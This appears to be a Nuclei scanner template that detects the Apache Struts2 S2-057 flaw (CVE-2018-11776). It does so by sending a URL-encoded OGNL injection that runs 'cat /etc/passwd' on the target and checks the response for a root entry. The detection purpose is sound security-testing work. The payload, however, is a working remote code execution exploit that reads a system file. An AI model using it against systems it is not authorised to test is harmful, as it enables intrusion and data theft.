id: CVE-2018-11776 info: name: Apache Struts2 S2-057 RCE author: pikpikcu severity: critical reference: https://github.com/jas502n/St2-057 tags: cve,cve2018,apache,rce,struts2 requests: - method: GET path: - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200